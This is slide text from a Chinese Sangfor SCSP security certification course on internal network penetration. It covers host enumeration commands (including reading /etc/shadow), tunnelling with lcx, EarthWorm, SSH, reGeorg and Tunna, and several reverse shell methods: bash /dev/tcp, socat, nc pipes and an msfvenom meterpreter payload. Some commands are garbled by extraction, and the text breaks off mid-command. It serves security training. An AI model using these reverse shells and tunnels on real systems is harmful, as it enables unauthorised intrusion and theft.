第三章-WEB安全SCSP_3 7_内网渗透_Ver2 0

深信服智安全认证-SCSP Contents 端口转发 权限突破 反弹shell 信息收集 深信服智安全认证-SCSP 内网渗透？ 简单而言：内网渗透就是拿到企业或者公司等的内网权限，然后从内网得到最有价值的战果。 深信服智安全认证-SCSP 信息收集 Windows本地信息收集： hostname 获取主机名 systeminfo 获取系统信息 set 环境变量 tasklist /v 查看进程 net session 在线管理员 net view 在线主机 net localgroup 本地组 net localgroup administrators 管理员组 net share 共享信息 wmic qfe list 获取系统补丁情况 sc query state= all 提供的服务 深信服智安全认证-SCSP 信息收集 Linux本地信息收集： 系统信息 uname -a 打印系统信息 cat /proc/version 内核信息 df -a 文件系统 用户信息 cat /etc/passwd 列出系统所有用户 cat /etc/group 列出系统所有组 cat /etc/shadow 列出所有用户hash（需要root权限） users 当前登录的用户 who -a 当前登录的用户 w 显示目前登入系统的用户有那些人，以及他们正在执行的程序 last 显示登入过的用户信息 深信服智安全认证-SCSP 信息收集 Linux本地信息收集： lastlog 显示系统中所有用户最近一次登录信息 lastlog u 用户名 显示指定用户最后一次登入信息 whoami 当前用户 id 当前用户信息 cat /etc/sudoers 可以使用sudo提升到root的用户（需要root权限） sudo 允许普通用户执行一些或者全部的root命令的一个工具 sudo -l 列出目前用户可执行与无法执行的指令 环境信息 env 打印系统环境信息 set 打印系统环境信息 echo $PATH 环境变量中的路径信息 深信服智安全认证-SCSP 信息收集 Linux本地信息收集： 网络命令 netstat -tulpn 显示对应了进程ID（PID）的网络端口 watch ss -stplu 通过套接字实时观察 TCP, UDP 端口 lsof -i 显示确认了的连接 深信服智安全认证-SCSP Contents 端口转发 权限突破 反弹shell 信息收集 深信服智安全认证-SCSP 内网代理工具 正向代理：以内网某台机器为跳板，做正向代理进行内网穿透 反向代理：将内网的流量转发到外网vps，做反向代理进行内网穿透 内网代理工具分为3类： 端口转发工具 web脚本代理 shell反弹 深信服智安全认证-SCSP 端口转发工具-lcx lcx.exe： lcx.exe -slave x.x.x.x 10001 3389 受害者机器的3389端口转发到x.x.x.x 公网的 10001 端口 lcx.exe listen 10000 10001 监听攻击者公网机器上的 10000 端口请求，并将 10000 的请求传送 给 10001 端口 攻击者远程桌面 :10000 特点：需要上传lcx.exe程序执行，并需要vps进行反弹 深信服智安全认证-SCSP 端口转发工具-EarthWorm EarthWorm+SocksCap64： 攻击者： ./ew -s rcsocks -l 1080 -e 8888 在 的公网主机添加转接隧道，将 1080 收到的代理请求转交给反 连 8888 端口的主机 受害者：./ew -s rssocks -d -e 8888 将目标网络的可控边界主机反向连接公网主机，攻击者可通过访问 :1080 端口使用 rssocks 主机提供的 socks5 代理服务 特点：支持多平台；正向代理、反向代理(需要vps)；多重网络应用。 深信服智安全认证-SCSP 端口转发工具-SSH Linux ssh端口转发： 攻击者（SSH本地端口转发）： ssh -L : 例子：ssh -L 7001:localhost:389 LdapServerHost 受害者（SSH远程端口转发）： ssh -R : 例子：ssh -R 7001:localhost:389 LdapClientHost 深信服智安全认证-SCSP web代理脚本-reGeorg reGeorg+Proxifier(windows)+proxychains(linux)： python reGeorgSocksProxy.py -u -p 9999 特点：正向代理需上传shell且需配合Proxifier使用，内网渗透必备即 使尚未提权，不需要vps。 深信服智安全认证-SCSP web代理脚本-Tunna Tunna脚本： python proxy.py -u http:/x.x.x.x/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上，本地直 接远程:1234即可访问远程桌面 python proxy.py -u http:/x.x.x.x/conn.php -l 1234 -a -r 3389 转发内网其他主机的端口 python proxy.py -u http:/x.x.x.x/conn.php -l 1234 -r 22 -v -s 转发SSH服务需要加上-s参数避免中断 特点：正向代理需上传webshell，22和3389端口均可，亦可代理内 网其他主机， 不需要vps，但速度有点慢。 深信服智安全认证-SCSP Contents 端口转发 权限突破 反弹shell 信息收集 深信服智安全认证-SCSP 权限提升 很多时候我们入侵一个网站的时候，想要的是得到这个服务器的权限 ，也就是admin权限，但是一般默认得到的是普通用户的权限，权限 很小，所以就要通过其他手段，提升自己的权限。 提权是将服务器的普通用户提升为管理员用户的一种操作，提权常常 用于辅助旁注攻击。 深信服智安全认证-SCSP Contents 端口转发 权限突破 反弹shell 信息收集 深信服智安全认证-SCSP 开启Shell监听 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端，此时我们 首先想到的是开启一个shell监听，这种场景比较简单，我们直接使用使用nc即可开启 深信服智安全认证-SCSP 反弹Shell 目标主机为一个内网主机，并没有公网IP地址，我 们无法从外网发起对目标主机的远程连接，此时我 们使用的方法是使用获取的webshell主动发起一 个反弹的shell到外网，然后获取一个目标主机的 shell终端控制环境 深信服智安全认证-SCSP 反弹shell Linux通过bash反弹shell（姿势一） 攻击者： nc.exe -lvnp 8887 受害者： root# bash -i & /dev/tcp/真实IP/8887 0&1 成功执行命令： 深信服智安全认证-SCSP 反弹shell Linux通过bash反弹shell（姿势二） 攻击者： nc.exe -lvnp 8887 受害者： rootkali:# mknod /tmp/backpipe p rootkali:# telnet 真实IP 0backpipe 成功执行命令： 深信服智安全认证-SCSP 反弹shell Linux通过bash反弹shell（姿势二） 深信服智安全认证-SCSP 反弹shell Linux通过nc反弹shell（姿势三） 攻击者： nc.exe -lvnp 8887 受害者： rootkali:# mknod /tmp/backpipe p rootkali:# /bin/sh 0/tmp/backpipe 成功执行命令： 深信服智安全认证-SCSP 反弹shell Linux通过socat反弹shell（姿势四） 攻击者： root# socat TCP-LISTEN:8887 - 受害者： rootkali:# socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:74：12345 成功执行命令： 深信服智安全认证-SCSP 反弹shell 通过msf反弹shell（姿势五） 攻击者： rootkali:# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=真实IP LPORT=8887 -f exe -o /root/python/sys